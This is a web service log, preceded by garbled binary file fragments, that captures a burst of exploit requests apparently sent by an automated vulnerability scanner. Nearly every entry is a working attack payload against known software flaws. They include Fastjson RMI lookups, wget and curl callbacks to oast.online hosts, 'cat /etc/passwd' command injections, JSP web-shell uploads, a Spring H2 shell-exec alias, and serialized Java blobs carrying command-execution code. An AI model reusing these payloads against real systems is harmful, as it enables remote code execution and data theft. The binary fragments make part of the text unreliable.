������d���INCL����shared_anno.iff�BG44�����J������???7?*?�BG44������??BG44�����
FORM����DJVIANTa���P(metadata
(Copyright "\
" . qx{curl `whoami`.cb6o5meg2jqcit8000106b6as685dukhj.oast.online} . \
" b ") )
------WebKitFormBoundaryIMv3mxRg59TkFSX5--
2022-07-12 22:21:26.4229|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
2022-07-12 22:22:04.6585|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://cb6o5meg2jqcit800010bgt4dqw7xpd37.oast.online/Exploit",
"autoCommit":true
}
2022-07-12 22:22:29.6662|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="logfile"; filename=""
Content-Type: text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
2022-07-12 22:22:57.7163|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:23:45.6100|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:23:52.0544|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"command": "run",
"utilCmdArgs": "-c 'echo CVE-2022-1388 | rev'"
}
2022-07-12 22:23:55.5549|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 -----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
2022-07-12 22:23:55.9079|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"command": "run",
"utilCmdArgs": "-c 'echo CVE-2022-1388 | rev'"
}
2022-07-12 22:24:00.6458|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
_CobblerXMLRPCInterface__make_token
cobbler
2022-07-12 22:24:11.1733|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:24:17.0282|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:24:21.0300|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://cb6o5meg2jqcit800010r119jbhmys41m.oast.online/Exploit",
"autoCommit":true
}
}
2022-07-12 22:24:24.7812|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://cb6o5meg2jqcit800010dxwkh7owoufnf.oast.online/Exploit",
"autoCommit":true
}
2022-07-12 22:24:34.9098|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"user":"admin","password":"password","type":"login"}
2022-07-12 22:25:17.8704|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:27:24.7327|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
2022-07-12 22:27:26.6880|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"objs": [{"FID": "init"}], "SID": "|wget http://cb6o5meg2jqcit800010g5ztihddsuc4m.oast.online|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
2022-07-12 22:28:30.0505|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:28:42.9867|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:28:46.7018|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 test_data
2022-07-12 22:28:59.9329|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
2022-07-12 22:29:12.5664|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 s=phpinfo()&_method=__construct&filter=assert
2022-07-12 22:29:27.8670|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 admuser=admin&admpass=;wget http://cb6o5meg2jqcit800010rypfmg9amm134.oast.online;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
2022-07-12 22:30:22.2591|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:30:33.1398|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80
2022-07-12 22:30:37.1256|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_name"
2BqZOZ7deE5hP6c5phOmpHjXFUB
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_front"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_changed"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_filename"; filename="2BqZOZ7deE5hP6c5phOmpHjXFUB.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-2894";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i
------WebKitFormBoundaryuim0dyiDSPBPu31g--
2022-07-12 22:31:55.5460|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 -----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/2bqzodvgec6gnpdqtggkxdwac6b.jsp";filename="test.jsp"
Content-Type: application/octet-stream
<% out.print("WSO2-RCE-CVE-2022-29464"); %>
-----------------------------250033711231076532771336998311--
2022-07-12 22:33:33.3179|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 type='|cat /etc/passwd||'
2022-07-12 22:33:50.1588|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:34:21.1522|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
2022-07-12 22:34:24.1985|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:34:28.1272|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:35:23.7255|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:36:15.6204|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:36:19.5361|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:36:23.4659|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
2022-07-12 22:36:27.4578|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
2022-07-12 22:38:24.9868|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
"dataSourceName":"rmi://cb6o5meg2jqcit800010mbnchg96dkoy1.oast.online/Exploit",
"autoCommit":true
}
2022-07-12 22:38:38.5686|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://cb6o5meg2jqcit8000105c9754xwmw74h.oast.online&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
2022-07-12 22:39:34.7756|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:40:18.1699|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:40:33.3401|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:40:51.6617|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:42:56.9454|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
2022-07-12 22:43:17.0029|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:43:42.7589|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:43:43.7125|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:44:38.9446|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"params":"w=123\"'1234123'\"|cat /etc/passwd"}
2022-07-12 22:44:41.4765|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:44:45.2569|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"token": {
"$func": "var_dump"
}
}
2022-07-12 22:44:49.5185|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:44:53.2918|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:44:56.4594|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"name":"spring.datasource.hikari.connection-test-query",
"value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');"
}
2022-07-12 22:45:47.5924|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:45:51.8881|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
2022-07-12 22:46:13.8871|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
2022-07-12 22:46:29.6050|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:46:31.3527|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]>
2022-07-12 22:46:33.1447|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:46:35.2955|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 xxxxoracle.toplink.internal.sessions.UnitOfWorkChangeSet-84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130673013951051101001011101167811710998101114730149511611497110115108101116731101001011209101095981211161019911110010111511603919166910695991089711511511601891761069711897471089711010347671089711511559760595110971091011160187610697118974710897110103478311611410511010359760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-11171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112008-82-54-2-70-6600050099100303470977037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-9040769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775976991111094711511711047111114103479711297991041014712010910847105110116101114110971084710011610947688477651201051157311610111497116111114597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471151011141059710810512210111447831011141059710810512297116105111110729711010010810111459418610810511610111497116111114105376991111094711511711047111114103479711297991041014712010910847105110116101114110971084710011610947688477651201051157311610111497116111114591071049711010010810111410657699111109471151171104711111410347971129799104101471201091084710511011610111411097108471151011141059710810512210111447831011141059710810512297116105111110729711010010810111459101083111117114991017010510810110127197100103101116115461069711897120100117040105112111511111510111410597108471129712110811197100115471171161051084771971001031011161153683116117988411497110115108101116809712110811197100106499111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994711411711011610510910147659811511611497991168411497110115108101116102010697118974710511147831011141059710810512297981081011057991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947841149711011510810111669120991011121161051111101031121115111115101114105971084711297121108111971001154711711610510847719710010310111611510860991081051101051166210181069711897471051114770105108101871141051161011147042102210697118974710897110103478311611410511010366117102102101114704410045034101610697118974710897110103478410411410197100704710139911711411410111011684104114101971001020404176106971189747108971101034784104114101971005912049050100480511021103101116671111101161011201166710897115115761119710010111410254041761069711897471089711010347671089711511576111971001011145912053054100480551014780571021106971189747108971101034767108971151157611197100101114705910111031011168210111511111711499101103440761069711897471089711010347831161141051101035941761069711897471101011164785827659120610621006006310121069711897471101011164785827670651071031011168097116104102040417610697118974710897110103478311611410511010359120670681006606910697112112101110100104440761069711897471089711010347831161141051101035941761069711897471089711010347831161141051101036611710210210111459120710721004507310174646474646471029711810599111110461059911180751081161118311611410511010312077068100450781021407610697118974710897110103478311611410511010359418612010080100430811016106971189747108971101034783116114105110103708310108611710811010111497981081018085100840811014